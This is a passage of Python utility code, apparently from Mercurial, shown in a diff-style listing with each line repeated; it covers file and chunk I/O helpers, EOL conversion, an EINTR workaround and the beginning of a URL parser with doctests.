2240 rename(self._tempname, filename)
2241
2241
2242 def discard(self):
2242 def discard(self):
2243 if not self._fp.closed:
2243 if not self._fp.closed:
2244 try:
2244 try:
2245 os.unlink(self._tempname)
2245 os.unlink(self._tempname)
2246 except OSError:
2246 except OSError:
2247 pass
2247 pass
2248 self._fp.close()
2248 self._fp.close()
2249
2249
2250 def __del__(self):
2250 def __del__(self):
2251 if safehasattr(self, '_fp'): # constructor actually did something
2251 if safehasattr(self, '_fp'): # constructor actually did something
2252 self.discard()
2252 self.discard()
2253
2253
2254 def __enter__(self):
2254 def __enter__(self):
2255 return self
2255 return self
2256
2256
2257 def __exit__(self, exctype, excvalue, traceback):
2257 def __exit__(self, exctype, excvalue, traceback):
2258 if exctype is not None:
2258 if exctype is not None:
2259 self.discard()
2259 self.discard()
2260 else:
2260 else:
2261 self.close()
2261 self.close()
2262
2262
2263 def unlinkpath(f, ignoremissing=False, rmdir=True):
2263 def unlinkpath(f, ignoremissing=False, rmdir=True):
2264 """unlink and remove the directory if it is empty"""
2264 """unlink and remove the directory if it is empty"""
2265 if ignoremissing:
2265 if ignoremissing:
2266 tryunlink(f)
2266 tryunlink(f)
2267 else:
2267 else:
2268 unlink(f)
2268 unlink(f)
2269 if rmdir:
2269 if rmdir:
2270 # try removing directories that might now be empty
2270 # try removing directories that might now be empty
2271 try:
2271 try:
2272 removedirs(os.path.dirname(f))
2272 removedirs(os.path.dirname(f))
2273 except OSError:
2273 except OSError:
2274 pass
2274 pass
2275
2275
2276 def tryunlink(f):
2276 def tryunlink(f):
2277 """Attempt to remove a file, ignoring ENOENT errors."""
2277 """Attempt to remove a file, ignoring ENOENT errors."""
2278 try:
2278 try:
2279 unlink(f)
2279 unlink(f)
2280 except OSError as e:
2280 except OSError as e:
2281 if e.errno != errno.ENOENT:
2281 if e.errno != errno.ENOENT:
2282 raise
2282 raise
2283
2283
2284 def makedirs(name, mode=None, notindexed=False):
2284 def makedirs(name, mode=None, notindexed=False):
2285 """recursive directory creation with parent mode inheritance
2285 """recursive directory creation with parent mode inheritance
2286
2286
2287 Newly created directories are marked as "not to be indexed by
2287 Newly created directories are marked as "not to be indexed by
2288 the content indexing service", if ``notindexed`` is specified
2288 the content indexing service", if ``notindexed`` is specified
2289 for "write" mode access.
2289 for "write" mode access.
2290 """
2290 """
2291 try:
2291 try:
2292 makedir(name, notindexed)
2292 makedir(name, notindexed)
2293 except OSError as err:
2293 except OSError as err:
2294 if err.errno == errno.EEXIST:
2294 if err.errno == errno.EEXIST:
2295 return
2295 return
2296 if err.errno != errno.ENOENT or not name:
2296 if err.errno != errno.ENOENT or not name:
2297 raise
2297 raise
2298 parent = os.path.dirname(os.path.abspath(name))
2298 parent = os.path.dirname(os.path.abspath(name))
2299 if parent == name:
2299 if parent == name:
2300 raise
2300 raise
2301 makedirs(parent, mode, notindexed)
2301 makedirs(parent, mode, notindexed)
2302 try:
2302 try:
2303 makedir(name, notindexed)
2303 makedir(name, notindexed)
2304 except OSError as err:
2304 except OSError as err:
2305 # Catch EEXIST to handle races
2305 # Catch EEXIST to handle races
2306 if err.errno == errno.EEXIST:
2306 if err.errno == errno.EEXIST:
2307 return
2307 return
2308 raise
2308 raise
2309 if mode is not None:
2309 if mode is not None:
2310 os.chmod(name, mode)
2310 os.chmod(name, mode)
2311
2311
2312 def readfile(path):
2312 def readfile(path):
2313 with open(path, 'rb') as fp:
2313 with open(path, 'rb') as fp:
2314 return fp.read()
2314 return fp.read()
2315
2315
2316 def writefile(path, text):
2316 def writefile(path, text):
2317 with open(path, 'wb') as fp:
2317 with open(path, 'wb') as fp:
2318 fp.write(text)
2318 fp.write(text)
2319
2319
2320 def appendfile(path, text):
2320 def appendfile(path, text):
2321 with open(path, 'ab') as fp:
2321 with open(path, 'ab') as fp:
2322 fp.write(text)
2322 fp.write(text)
2323
2323
2324 class chunkbuffer(object):
2324 class chunkbuffer(object):
2325 """Allow arbitrary sized chunks of data to be efficiently read from an
2325 """Allow arbitrary sized chunks of data to be efficiently read from an
2326 iterator over chunks of arbitrary size."""
2326 iterator over chunks of arbitrary size."""
2327
2327
2328 def __init__(self, in_iter):
2328 def __init__(self, in_iter):
2329 """in_iter is the iterator that's iterating over the input chunks."""
2329 """in_iter is the iterator that's iterating over the input chunks."""
2330 def splitbig(chunks):
2330 def splitbig(chunks):
2331 for chunk in chunks:
2331 for chunk in chunks:
2332 if len(chunk) > 2**20:
2332 if len(chunk) > 2**20:
2333 pos = 0
2333 pos = 0
2334 while pos < len(chunk):
2334 while pos < len(chunk):
2335 end = pos + 2 ** 18
2335 end = pos + 2 ** 18
2336 yield chunk[pos:end]
2336 yield chunk[pos:end]
2337 pos = end
2337 pos = end
2338 else:
2338 else:
2339 yield chunk
2339 yield chunk
2340 self.iter = splitbig(in_iter)
2340 self.iter = splitbig(in_iter)
2341 self._queue = collections.deque()
2341 self._queue = collections.deque()
2342 self._chunkoffset = 0
2342 self._chunkoffset = 0
2343
2343
2344 def read(self, l=None):
2344 def read(self, l=None):
2345 """Read L bytes of data from the iterator of chunks of data.
2345 """Read L bytes of data from the iterator of chunks of data.
2346 Returns less than L bytes if the iterator runs dry.
2346 Returns less than L bytes if the iterator runs dry.
2347
2347
2348 If size parameter is omitted, read everything"""
2348 If size parameter is omitted, read everything"""
2349 if l is None:
2349 if l is None:
2350 return ''.join(self.iter)
2350 return ''.join(self.iter)
2351
2351
2352 left = l
2352 left = l
2353 buf = []
2353 buf = []
2354 queue = self._queue
2354 queue = self._queue
2355 while left > 0:
2355 while left > 0:
2356 # refill the queue
2356 # refill the queue
2357 if not queue:
2357 if not queue:
2358 target = 2**18
2358 target = 2**18
2359 for chunk in self.iter:
2359 for chunk in self.iter:
2360 queue.append(chunk)
2360 queue.append(chunk)
2361 target -= len(chunk)
2361 target -= len(chunk)
2362 if target <= 0:
2362 if target <= 0:
2363 break
2363 break
2364 if not queue:
2364 if not queue:
2365 break
2365 break
2366
2366
2367 # The easy way to do this would be to queue.popleft(), modify the
2367 # The easy way to do this would be to queue.popleft(), modify the
2368 # chunk (if necessary), then queue.appendleft(). However, for cases
2368 # chunk (if necessary), then queue.appendleft(). However, for cases
2369 # where we read partial chunk content, this incurs 2 dequeue
2369 # where we read partial chunk content, this incurs 2 dequeue
2370 # mutations and creates a new str for the remaining chunk in the
2370 # mutations and creates a new str for the remaining chunk in the
2371 # queue. Our code below avoids this overhead.
2371 # queue. Our code below avoids this overhead.
2372
2372
2373 chunk = queue[0]
2373 chunk = queue[0]
2374 chunkl = len(chunk)
2374 chunkl = len(chunk)
2375 offset = self._chunkoffset
2375 offset = self._chunkoffset
2376
2376
2377 # Use full chunk.
2377 # Use full chunk.
2378 if offset == 0 and left >= chunkl:
2378 if offset == 0 and left >= chunkl:
2379 left -= chunkl
2379 left -= chunkl
2380 queue.popleft()
2380 queue.popleft()
2381 buf.append(chunk)
2381 buf.append(chunk)
2382 # self._chunkoffset remains at 0.
2382 # self._chunkoffset remains at 0.
2383 continue
2383 continue
2384
2384
2385 chunkremaining = chunkl - offset
2385 chunkremaining = chunkl - offset
2386
2386
2387 # Use all of unconsumed part of chunk.
2387 # Use all of unconsumed part of chunk.
2388 if left >= chunkremaining:
2388 if left >= chunkremaining:
2389 left -= chunkremaining
2389 left -= chunkremaining
2390 queue.popleft()
2390 queue.popleft()
2391 # offset == 0 is enabled by block above, so this won't merely
2391 # offset == 0 is enabled by block above, so this won't merely
2392 # copy via ``chunk[0:]``.
2392 # copy via ``chunk[0:]``.
2393 buf.append(chunk[offset:])
2393 buf.append(chunk[offset:])
2394 self._chunkoffset = 0
2394 self._chunkoffset = 0
2395
2395
2396 # Partial chunk needed.
2396 # Partial chunk needed.
2397 else:
2397 else:
2398 buf.append(chunk[offset:offset + left])
2398 buf.append(chunk[offset:offset + left])
2399 self._chunkoffset += left
2399 self._chunkoffset += left
2400 left -= chunkremaining
2400 left -= chunkremaining
2401
2401
2402 return ''.join(buf)
2402 return ''.join(buf)
2403
2403
2404 def filechunkiter(f, size=131072, limit=None):
2404 def filechunkiter(f, size=131072, limit=None):
2405 """Create a generator that produces the data in the file size
2405 """Create a generator that produces the data in the file size
2406 (default 131072) bytes at a time, up to optional limit (default is
2406 (default 131072) bytes at a time, up to optional limit (default is
2407 to read all data). Chunks may be less than size bytes if the
2407 to read all data). Chunks may be less than size bytes if the
2408 chunk is the last chunk in the file, or the file is a socket or
2408 chunk is the last chunk in the file, or the file is a socket or
2409 some other type of file that sometimes reads less data than is
2409 some other type of file that sometimes reads less data than is
2410 requested."""
2410 requested."""
2411 assert size >= 0
2411 assert size >= 0
2412 assert limit is None or limit >= 0
2412 assert limit is None or limit >= 0
2413 while True:
2413 while True:
2414 if limit is None:
2414 if limit is None:
2415 nbytes = size
2415 nbytes = size
2416 else:
2416 else:
2417 nbytes = min(limit, size)
2417 nbytes = min(limit, size)
2418 s = nbytes and f.read(nbytes)
2418 s = nbytes and f.read(nbytes)
2419 if not s:
2419 if not s:
2420 break
2420 break
2421 if limit:
2421 if limit:
2422 limit -= len(s)
2422 limit -= len(s)
2423 yield s
2423 yield s
2424
2424
2425 class cappedreader(object):
2425 class cappedreader(object):
2426 """A file object proxy that allows reading up to N bytes.
2426 """A file object proxy that allows reading up to N bytes.
2427
2427
2428 Given a source file object, instances of this type allow reading up to
2428 Given a source file object, instances of this type allow reading up to
2429 N bytes from that source file object. Attempts to read past the allowed
2429 N bytes from that source file object. Attempts to read past the allowed
2430 limit are treated as EOF.
2430 limit are treated as EOF.
2431
2431
2432 It is assumed that I/O is not performed on the original file object
2432 It is assumed that I/O is not performed on the original file object
2433 in addition to I/O that is performed by this instance. If there is,
2433 in addition to I/O that is performed by this instance. If there is,
2434 state tracking will get out of sync and unexpected results will ensue.
2434 state tracking will get out of sync and unexpected results will ensue.
2435 """
2435 """
2436 def __init__(self, fh, limit):
2436 def __init__(self, fh, limit):
2437 """Allow reading up to <limit> bytes from <fh>."""
2437 """Allow reading up to <limit> bytes from <fh>."""
2438 self._fh = fh
2438 self._fh = fh
2439 self._left = limit
2439 self._left = limit
2440
2440
2441 def read(self, n=-1):
2441 def read(self, n=-1):
2442 if not self._left:
2442 if not self._left:
2443 return b''
2443 return b''
2444
2444
2445 if n < 0:
2445 if n < 0:
2446 n = self._left
2446 n = self._left
2447
2447
2448 data = self._fh.read(min(n, self._left))
2448 data = self._fh.read(min(n, self._left))
2449 self._left -= len(data)
2449 self._left -= len(data)
2450 assert self._left >= 0
2450 assert self._left >= 0
2451
2451
2452 return data
2452 return data
2453
2453
2454 def readinto(self, b):
2454 def readinto(self, b):
2455 res = self.read(len(b))
2455 res = self.read(len(b))
2456 if res is None:
2456 if res is None:
2457 return None
2457 return None
2458
2458
2459 b[0:len(res)] = res
2459 b[0:len(res)] = res
2460 return len(res)
2460 return len(res)
2461
2461
2462 def unitcountfn(*unittable):
2462 def unitcountfn(*unittable):
2463 '''return a function that renders a readable count of some quantity'''
2463 '''return a function that renders a readable count of some quantity'''
2464
2464
2465 def go(count):
2465 def go(count):
2466 for multiplier, divisor, format in unittable:
2466 for multiplier, divisor, format in unittable:
2467 if abs(count) >= divisor * multiplier:
2467 if abs(count) >= divisor * multiplier:
2468 return format % (count / float(divisor))
2468 return format % (count / float(divisor))
2469 return unittable[-1][2] % count
2469 return unittable[-1][2] % count
2470
2470
2471 return go
2471 return go
2472
2472
2473 def processlinerange(fromline, toline):
2473 def processlinerange(fromline, toline):
2474 """Check that linerange <fromline>:<toline> makes sense and return a
2474 """Check that linerange <fromline>:<toline> makes sense and return a
2475 0-based range.
2475 0-based range.
2476
2476
2477 >>> processlinerange(10, 20)
2477 >>> processlinerange(10, 20)
2478 (9, 20)
2478 (9, 20)
2479 >>> processlinerange(2, 1)
2479 >>> processlinerange(2, 1)
2480 Traceback (most recent call last):
2480 Traceback (most recent call last):
2481 ...
2481 ...
2482 ParseError: line range must be positive
2482 ParseError: line range must be positive
2483 >>> processlinerange(0, 5)
2483 >>> processlinerange(0, 5)
2484 Traceback (most recent call last):
2484 Traceback (most recent call last):
2485 ...
2485 ...
2486 ParseError: fromline must be strictly positive
2486 ParseError: fromline must be strictly positive
2487 """
2487 """
2488 if toline - fromline < 0:
2488 if toline - fromline < 0:
2489 raise error.ParseError(_("line range must be positive"))
2489 raise error.ParseError(_("line range must be positive"))
2490 if fromline < 1:
2490 if fromline < 1:
2491 raise error.ParseError(_("fromline must be strictly positive"))
2491 raise error.ParseError(_("fromline must be strictly positive"))
2492 return fromline - 1, toline
2492 return fromline - 1, toline
2493
2493
2494 bytecount = unitcountfn(
2494 bytecount = unitcountfn(
2495 (100, 1 << 30, _('%.0f GB')),
2495 (100, 1 << 30, _('%.0f GB')),
2496 (10, 1 << 30, _('%.1f GB')),
2496 (10, 1 << 30, _('%.1f GB')),
2497 (1, 1 << 30, _('%.2f GB')),
2497 (1, 1 << 30, _('%.2f GB')),
2498 (100, 1 << 20, _('%.0f MB')),
2498 (100, 1 << 20, _('%.0f MB')),
2499 (10, 1 << 20, _('%.1f MB')),
2499 (10, 1 << 20, _('%.1f MB')),
2500 (1, 1 << 20, _('%.2f MB')),
2500 (1, 1 << 20, _('%.2f MB')),
2501 (100, 1 << 10, _('%.0f KB')),
2501 (100, 1 << 10, _('%.0f KB')),
2502 (10, 1 << 10, _('%.1f KB')),
2502 (10, 1 << 10, _('%.1f KB')),
2503 (1, 1 << 10, _('%.2f KB')),
2503 (1, 1 << 10, _('%.2f KB')),
2504 (1, 1, _('%.0f bytes')),
2504 (1, 1, _('%.0f bytes')),
2505 )
2505 )
2506
2506
2507 class transformingwriter(object):
2507 class transformingwriter(object):
2508 """Writable file wrapper to transform data by function"""
2508 """Writable file wrapper to transform data by function"""
2509
2509
2510 def __init__(self, fp, encode):
2510 def __init__(self, fp, encode):
2511 self._fp = fp
2511 self._fp = fp
2512 self._encode = encode
2512 self._encode = encode
2513
2513
2514 def close(self):
2514 def close(self):
2515 self._fp.close()
2515 self._fp.close()
2516
2516
2517 def flush(self):
2517 def flush(self):
2518 self._fp.flush()
2518 self._fp.flush()
2519
2519
2520 def write(self, data):
2520 def write(self, data):
2521 return self._fp.write(self._encode(data))
2521 return self._fp.write(self._encode(data))
2522
2522
2523 # Matches a single EOL which can either be a CRLF where repeated CR
2523 # Matches a single EOL which can either be a CRLF where repeated CR
2524 # are removed or a LF. We do not care about old Macintosh files, so a
2524 # are removed or a LF. We do not care about old Macintosh files, so a
2525 # stray CR is an error.
2525 # stray CR is an error.
2526 _eolre = remod.compile(br'\r*\n')
2526 _eolre = remod.compile(br'\r*\n')
2527
2527
2528 def tolf(s):
2528 def tolf(s):
2529 return _eolre.sub('\n', s)
2529 return _eolre.sub('\n', s)
2530
2530
2531 def tocrlf(s):
2531 def tocrlf(s):
2532 return _eolre.sub('\r\n', s)
2532 return _eolre.sub('\r\n', s)
2533
2533
2534 def _crlfwriter(fp):
2534 def _crlfwriter(fp):
2535 return transformingwriter(fp, tocrlf)
2535 return transformingwriter(fp, tocrlf)
2536
2536
2537 if pycompat.oslinesep == '\r\n':
2537 if pycompat.oslinesep == '\r\n':
2538 tonativeeol = tocrlf
2538 tonativeeol = tocrlf
2539 fromnativeeol = tolf
2539 fromnativeeol = tolf
2540 nativeeolwriter = _crlfwriter
2540 nativeeolwriter = _crlfwriter
2541 else:
2541 else:
2542 tonativeeol = pycompat.identity
2542 tonativeeol = pycompat.identity
2543 fromnativeeol = pycompat.identity
2543 fromnativeeol = pycompat.identity
2544 nativeeolwriter = pycompat.identity
2544 nativeeolwriter = pycompat.identity
2545
2545
2546 if (pyplatform.python_implementation() == 'CPython' and
2546 if (pyplatform.python_implementation() == 'CPython' and
2547 sys.version_info < (3, 0)):
2547 sys.version_info < (3, 0)):
2548 # There is an issue in CPython that some IO methods do not handle EINTR
2548 # There is an issue in CPython that some IO methods do not handle EINTR
2549 # correctly. The following table shows what CPython version (and functions)
2549 # correctly. The following table shows what CPython version (and functions)
2550 # are affected (buggy: has the EINTR bug, okay: otherwise):
2550 # are affected (buggy: has the EINTR bug, okay: otherwise):
2551 #
2551 #
2552 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2552 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2553 # --------------------------------------------------
2553 # --------------------------------------------------
2554 # fp.__iter__ | buggy | buggy | okay
2554 # fp.__iter__ | buggy | buggy | okay
2555 # fp.read* | buggy | okay [1] | okay
2555 # fp.read* | buggy | okay [1] | okay
2556 #
2556 #
2557 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2557 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2558 #
2558 #
2559 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2559 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2560 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2560 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2561 #
2561 #
2562 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2562 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2563 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2563 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2564 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2564 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2565 # fp.__iter__ but not other fp.read* methods.
2565 # fp.__iter__ but not other fp.read* methods.
2566 #
2566 #
2567 # On modern systems like Linux, the "read" syscall cannot be interrupted
2567 # On modern systems like Linux, the "read" syscall cannot be interrupted
2568 # when reading "fast" files like on-disk files. So the EINTR issue only
2568 # when reading "fast" files like on-disk files. So the EINTR issue only
2569 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2569 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2570 # files approximately as "fast" files and use the fast (unsafe) code path,
2570 # files approximately as "fast" files and use the fast (unsafe) code path,
2571 # to minimize the performance impact.
2571 # to minimize the performance impact.
2572 if sys.version_info >= (2, 7, 4):
2572 if sys.version_info >= (2, 7, 4):
2573 # fp.readline deals with EINTR correctly, use it as a workaround.
2573 # fp.readline deals with EINTR correctly, use it as a workaround.
2574 def _safeiterfile(fp):
2574 def _safeiterfile(fp):
2575 return iter(fp.readline, '')
2575 return iter(fp.readline, '')
2576 else:
2576 else:
2577 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2577 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2578 # note: this may block longer than necessary because of bufsize.
2578 # note: this may block longer than necessary because of bufsize.
2579 def _safeiterfile(fp, bufsize=4096):
2579 def _safeiterfile(fp, bufsize=4096):
2580 fd = fp.fileno()
2580 fd = fp.fileno()
2581 line = ''
2581 line = ''
2582 while True:
2582 while True:
2583 try:
2583 try:
2584 buf = os.read(fd, bufsize)
2584 buf = os.read(fd, bufsize)
2585 except OSError as ex:
2585 except OSError as ex:
2586 # os.read only raises EINTR before any data is read
2586 # os.read only raises EINTR before any data is read
2587 if ex.errno == errno.EINTR:
2587 if ex.errno == errno.EINTR:
2588 continue
2588 continue
2589 else:
2589 else:
2590 raise
2590 raise
2591 line += buf
2591 line += buf
2592 if '\n' in buf:
2592 if '\n' in buf:
2593 splitted = line.splitlines(True)
2593 splitted = line.splitlines(True)
2594 line = ''
2594 line = ''
2595 for l in splitted:
2595 for l in splitted:
2596 if l[-1] == '\n':
2596 if l[-1] == '\n':
2597 yield l
2597 yield l
2598 else:
2598 else:
2599 line = l
2599 line = l
2600 if not buf:
2600 if not buf:
2601 break
2601 break
2602 if line:
2602 if line:
2603 yield line
2603 yield line
2604
2604
2605 def iterfile(fp):
2605 def iterfile(fp):
2606 fastpath = True
2606 fastpath = True
2607 if type(fp) is file:
2607 if type(fp) is file:
2608 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2608 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2609 if fastpath:
2609 if fastpath:
2610 return fp
2610 return fp
2611 else:
2611 else:
2612 return _safeiterfile(fp)
2612 return _safeiterfile(fp)
2613 else:
2613 else:
2614 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2614 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2615 def iterfile(fp):
2615 def iterfile(fp):
2616 return fp
2616 return fp
2617
2617
2618 def iterlines(iterator):
2618 def iterlines(iterator):
2619 for chunk in iterator:
2619 for chunk in iterator:
2620 for line in chunk.splitlines():
2620 for line in chunk.splitlines():
2621 yield line
2621 yield line
2622
2622
2623 def expandpath(path):
2623 def expandpath(path):
2624 return os.path.expanduser(os.path.expandvars(path))
2624 return os.path.expanduser(os.path.expandvars(path))
2625
2625
2626 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2626 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2627 """Return the result of interpolating items in the mapping into string s.
2627 """Return the result of interpolating items in the mapping into string s.
2628
2628
2629 prefix is a single character string, or a two character string with
2629 prefix is a single character string, or a two character string with
2630 a backslash as the first character if the prefix needs to be escaped in
2630 a backslash as the first character if the prefix needs to be escaped in
2631 a regular expression.
2631 a regular expression.
2632
2632
2633 fn is an optional function that will be applied to the replacement text
2633 fn is an optional function that will be applied to the replacement text
2634 just before replacement.
2634 just before replacement.
2635
2635
2636 escape_prefix is an optional flag that allows using doubled prefix for
2636 escape_prefix is an optional flag that allows using doubled prefix for
2637 its escaping.
2637 its escaping.
2638 """
2638 """
2639 fn = fn or (lambda s: s)
2639 fn = fn or (lambda s: s)
2640 patterns = '|'.join(mapping.keys())
2640 patterns = '|'.join(mapping.keys())
2641 if escape_prefix:
2641 if escape_prefix:
2642 patterns += '|' + prefix
2642 patterns += '|' + prefix
2643 if len(prefix) > 1:
2643 if len(prefix) > 1:
2644 prefix_char = prefix[1:]
2644 prefix_char = prefix[1:]
2645 else:
2645 else:
2646 prefix_char = prefix
2646 prefix_char = prefix
2647 mapping[prefix_char] = prefix_char
2647 mapping[prefix_char] = prefix_char
2648 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2648 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2649 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2649 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2650
2650
2651 def getport(port):
2651 def getport(port):
2652 """Return the port for a given network service.
2652 """Return the port for a given network service.
2653
2653
2654 If port is an integer, it's returned as is. If it's a string, it's
2654 If port is an integer, it's returned as is. If it's a string, it's
2655 looked up using socket.getservbyname(). If there's no matching
2655 looked up using socket.getservbyname(). If there's no matching
2656 service, error.Abort is raised.
2656 service, error.Abort is raised.
2657 """
2657 """
2658 try:
2658 try:
2659 return int(port)
2659 return int(port)
2660 except ValueError:
2660 except ValueError:
2661 pass
2661 pass
2662
2662
2663 try:
2663 try:
2664 return socket.getservbyname(pycompat.sysstr(port))
2664 return socket.getservbyname(pycompat.sysstr(port))
2665 except socket.error:
2665 except socket.error:
2666 raise error.Abort(_("no port number associated with service '%s'")
2666 raise error.Abort(_("no port number associated with service '%s'")
2667 % port)
2667 % port)
2668
2668
2669 class url(object):
2669 class url(object):
2670 r"""Reliable URL parser.
2670 r"""Reliable URL parser.
2671
2671
2672 This parses URLs and provides attributes for the following
2672 This parses URLs and provides attributes for the following
2673 components:
2673 components:
2674
2674
2675 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2675 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2676
2676
2677 Missing components are set to None. The only exception is
2677 Missing components are set to None. The only exception is
2678 fragment, which is set to '' if present but empty.
2678 fragment, which is set to '' if present but empty.
2679
2679
2680 If parsefragment is False, fragment is included in query. If
2680 If parsefragment is False, fragment is included in query. If
2681 parsequery is False, query is included in path. If both are
2681 parsequery is False, query is included in path. If both are
2682 False, both fragment and query are included in path.
2682 False, both fragment and query are included in path.
2683
2683
2684 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2684 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2685
2685
2686 Note that for backward compatibility reasons, bundle URLs do not
2686 Note that for backward compatibility reasons, bundle URLs do not
2687 take host names. That means 'bundle://../' has a path of '../'.
2687 take host names. That means 'bundle://../' has a path of '../'.
2688
2688
2689 Examples:
2689 Examples:
2690
2690
2691 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2691 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2692 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2692 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2693 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2693 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2694 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2694 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2695 >>> url(b'file:///home/joe/repo')
2695 >>> url(b'file:///home/joe/repo')
2696 <url scheme: 'file', path: '/home/joe/repo'>
2696 <url scheme: 'file', path: '/home/joe/repo'>
2697 >>> url(b'file:///c:/temp/foo/')
2697 >>> url(b'file:///c:/temp/foo/')
2698 <url scheme: 'file', path: 'c:/temp/foo/'>
2698 <url scheme: 'file', path: 'c:/temp/foo/'>
2699 >>> url(b'bundle:foo')
2699 >>> url(b'bundle:foo')
2700 <url scheme: 'bundle', path: 'foo'>
2700 <url scheme: 'bundle', path: 'foo'>
2701 >>> url(b'bundle://../foo')
2701 >>> url(b'bundle://../foo')
2702 <url scheme: 'bundle', path: '../foo'>
2702 <url scheme: 'bundle', path: '../foo'>
2703 >>> url(br'c:\foo\bar')
2703 >>> url(br'c:\foo\bar')
2704 <url path: 'c:\\foo\\bar'>
2704 <url path: 'c:\\foo\\bar'>
2705 >>> url(br'\\blah\blah\blah')
2705 >>> url(br'\\blah\blah\blah')
2706 <url path: '\\\\blah\\blah\\blah'>
2706 <url path: '\\\\blah\\blah\\blah'>
2707 >>> url(br'\\blah\blah\blah#baz')
2707 >>> url(br'\\blah\blah\blah#baz')
2708 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2708 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2709 >>> url(br'file:///C:\users\me')
2709 >>> url(br'file:///C:\users\me')
2710 <url scheme: 'file', path: 'C:\\users\\me'>
2710 <url scheme: 'file', path: 'C:\\users\\me'>
2711
2711
2712 Authentication credentials:
2712 Authentication credentials:
2713
2713
2714 >>> url(b'ssh://joe:xyz@x/repo')
2714 >>> url(b'ssh://joe:xyz@x/repo')
2715 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2715 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2716 >>> url(b'ssh://joe@x/repo')
2716 >>> url(b'ssh://joe@x/repo')
2717 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2717 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2718
2718
2719 Query strings and fragments:
2719 Query strings and fragments:
2720
2720
2721 >>> url(b'http://host/a?b#c')
2721 >>> url(b'http://host/a?b#c')
2722 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2722 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2723 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2723 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2724 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2724 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2725
2725
2726 Empty path:
2726 Empty path:
2727
2727
2728 >>> url(b'')
2728 >>> url(b'')
2729 <url path: ''>
2729 <url path: ''>
2730 >>> url(b'#a')
2730 >>> url(b'#a')
2731 <url path: '', fragment: 'a'>
2731 <url path: '', fragment: 'a'>
2732 >>> url(b'http://host/')
2732 >>> url(b'http://host/')
2733 <url scheme: 'http', host: 'host', path: ''>
2733 <url scheme: 'http', host: 'host', path: ''>
2734 >>> url(b'http://host/#a')
2734 >>> url(b'http://host/#a')
2735 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2735 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2736
2736
2737 Only scheme:
2737 Only scheme:
2738
2738
2739 >>> url(b'http:')
2739 >>> url(b'http:')
2740 <url scheme: 'http'>
2740 <url scheme: 'http'>
2741 """
2741 """
2742
2742
2743 _safechars = "!~*'()+"
2743 _safechars = "!~*'()+"
2744 _safepchars = "/!~*'()+:\\"
2744 _safepchars = "/!~*'()+:\\"
2745 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2745 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2746
2746
2747 def __init__(self, path, parsequery=True, parsefragment=True):
2747 def __init__(self, path, parsequery=True, parsefragment=True):
2748 # We slowly chomp away at path until we have only the path left
2748 # We slowly chomp away at path until we have only the path left
2749 self.scheme = self.user = self.passwd = self.host = None
2749 self.scheme = self.user = self.passwd = self.host = None
2750 self.port = self.path = self.query = self.fragment = None
2750 self.port = self.path = self.query = self.fragment = None
2751 self._localpath = True
2751 self._localpath = True
2752 self._hostport = ''
2752 self._hostport = ''
2753 self._origpath = path
2753 self._origpath = path
2754
2754
2755 if parsefragment and '#' in path:
2755 if parsefragment and '#' in path:
2756 path, self.fragment = path.split('#', 1)
2756 path, self.fragment = path.split('#', 1)
2757
2757
2758 # special case for Windows drive letters and UNC paths
2758 # special case for Windows drive letters and UNC paths
2759 if hasdriveletter(path) or path.startswith('\\\\'):
